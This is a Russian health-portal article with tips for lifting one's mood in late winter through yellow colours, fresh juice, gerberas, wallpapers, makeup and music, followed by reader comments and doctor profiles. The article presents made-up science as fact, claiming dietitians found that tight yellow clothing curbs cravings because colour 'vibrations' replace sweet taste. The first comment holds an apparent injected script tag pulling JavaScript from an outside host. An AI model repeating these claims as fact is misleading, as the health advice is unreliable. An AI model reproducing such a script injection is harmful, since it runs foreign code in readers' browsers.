Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как «включить» хорошее на...  >>  Как «включить» хорошее настроение
 
Обратная связь
 

Как «включить» хорошее настроение

Размер шрифта
15 февраля 2011 00:00
  • google_analytics: false
  • Нравится

О чем мы мечтаем в феврале? Конечно, о лете! Наши силы на исходе, приближающийся март грозит синдромом весенней усталости, а погода и календарь не обнадеживают…

Но это совсем не повод откладывать лето! Чтобы создать летнее настроение, совсем не обязательно срываться в дальние страны. Включите собственное «внутреннее» солнце, и мир улыбнется вам, а сил с каждым днем будет больше и больше!

Здравствуй, это я! Микроклимат целого дня зависит от того, каким будет наш первый взгляд в зеркало: недовольно-критическим или дружелюбным. Чтобы создать правильный настрой, нарисуйте желтым светящимся маркером на уголке зеркала в ванной улыбающееся солнце. Оно станет своевременным напоминанием об «улыбке приветствия» отражению. И выверните голографическую лампочку: ее свет гипертрофирует даже самые мелкие дефекты кожи и автоматически портит настроение.

Солнечный интерьер. Удивительно, как преображается атмосфера в помещении, если в нем присутствует ярко-желтое пятно. Специалисты фэн шуй и хромотерапевты единодушно приписывают желтому цвету вибрации стабильности, удовлетворенности и оптимизма. Желтый символизирует стихию Земли и сладость жизни. Желтое покрывало на кровати, диванные подушки (обязательно квадратные, именно эта форма вступает в верный резонанс с желтым цветом) или постельное белье буквально растворяют «серые» мысли и эмоции и согревают душу.

Ближе к телу. Знаете устойчивое выражение «Желтая майка лидера»? А почему не синяя и не красная? Не только из-за того, что желтый издали бросается в глаза. Но и потому, что одежда желтого цвета помогает сконцентрироваться, сохранять спокойствие и видеть выход из самых кризисных ситуаций – то есть действительно быть лидером. А последние исследования диетологов подтвердили: нося прилегающую к телу желтую одежду, проще отказаться от мучного и сладкого! Дело в том, что вибрации этого цвета и сладкий вкус на уровне волн взаимозаменяемы. Носите желтое – и худейте!

Летняя медитация. Это упражнение занимает не больше 15 минут, но после него чувствуешь себя как после уик-энда на природе. Оно идеально для общественного транспорта и вынужденного ожидания.

Закройте глаза и сделайте несколько глубоких вдохов. Теперь представьте, как вы стоите под яркими и теплыми солнечными лучами. Постарайтесь увидеть свое тело совершенно прозрачным, светопроницаемым. Если где-то заметны «замутнения» или темные пятна, мысленно направьте в эту область дополнительный солнечный луч. Ощутите его ласковое тепло, растворяющее тьму. Когда все пятна исчезнут, представьте, что теперь вас омывают не только солнечные лучи, но и кристально чистые струи горного водопада. Постойте под ним несколько минут; затем выйдите из потока, и пусть солнечные лучи высушат капли на вашей коже.

Сочные краски. Желтый цвет позитивно действует на настроение не только снаружи, но и изнутри. Начинайте каждое утро со свежевыжатого сока солнечных оттенков: апельсинового, лимонного, грейпфрутового, тыквенного, морковного… Но именно свежего: чем дольше этот эликсир здоровья ждет своей очереди, тем меньше витаминов и микроэлементов в нем остается. Перед вами бесконечное число вариантов, как именно доставить себе радость и пользу: создавайте собственные фруктово-овощные коктейли, экспериментируй с пропорциями и сочетаниями. Пусть каждое утро будет ПО-СВОЕМУ солнечным!

Лето на подоконнике. Пейзаж за окном с преобладающими оттенками свинцового и асфальтового сводит на нет все усилия ощутить лето? Поставьте «визуальный барьер», который будет перебивать сумрачную информацию снаружи. Для этой цели подойдет одна или несколько ярких гербер в прозрачной вазе на подоконнике. Теперь, когда вы кинете даже случайный взгляд на окно, в первую очередь в мозг поступит информация о солнечных красках и лепестках-лучах этих элегантных цветов. Остальные «детали», вроде туч и снегодождя, будут восприниматься уже через «герберовую призму» и никак не отразятся на настроении!

Солнечные ванны… на работе. Большую часть светового дня вы проводите за компьютером? Пусть солнце светит с экрана! Просто подберите подходящую заставку на монитор. Но только не романтический пейзаж с закатом! Вспомним слова Маленького Принца Сент-Экзюпери: «на закат хорошо смотреть, когда тебе грустно». Даже самый красивый вид заходящего солнца навевает меланхолию – а нам нужен прямо противоположный эффект! По-настоящему летнее настроение создаст цветущее поле земных солнышек – подсолнухов.

Выход в свет. Чтобы создавать ощущение «луча света в темном царстве» запаситесь более изящными аксессуарами все того же жизнеутверждающего цвета. Большие круглые серьги, косынка или клатч станут ненавязчивым, но знаковым акцентом.

Макияж тоже обязан быть летним! Начальство любит преданных делу сотрудников, но не любит бледные физиономии с темными кругами под глазами. Даже если нет времени подставить лицо пусть и февральском солнцу и отдых заключается в кратких перебежках от работы до дома, это никого не касается. Бронзовая пудра на скулах и ключицах, чуть более «летний» цвет тонального средства, шоколадные, золотистые или даже ярко-желтые тени, и вы – живая иллюстрация к сюжету «Из жизни отдыхающих».

Легкая музыка. Закрепим эффект от солнечных образов и ощущений соответствующим музыкальным сопровождением. Тогда все ваше тело погрузится в лето на всех каналах восприятия! У каждого свое представление о самой солнечной музыке. Для одних это, бесспорно, регги. Для других – испанская гитара или этническая музыка. Третьим ближе формат «Дискотеки 80-х». Пусть в наушниках раздается голос Боба Марли или мелодии фламенко, главное, чтобы вы ощущали: если Солнце умеет петь, оно поет именно так!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

01 июля 2015 в 00:20

Комментарий удален за нарушение Правил общения

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.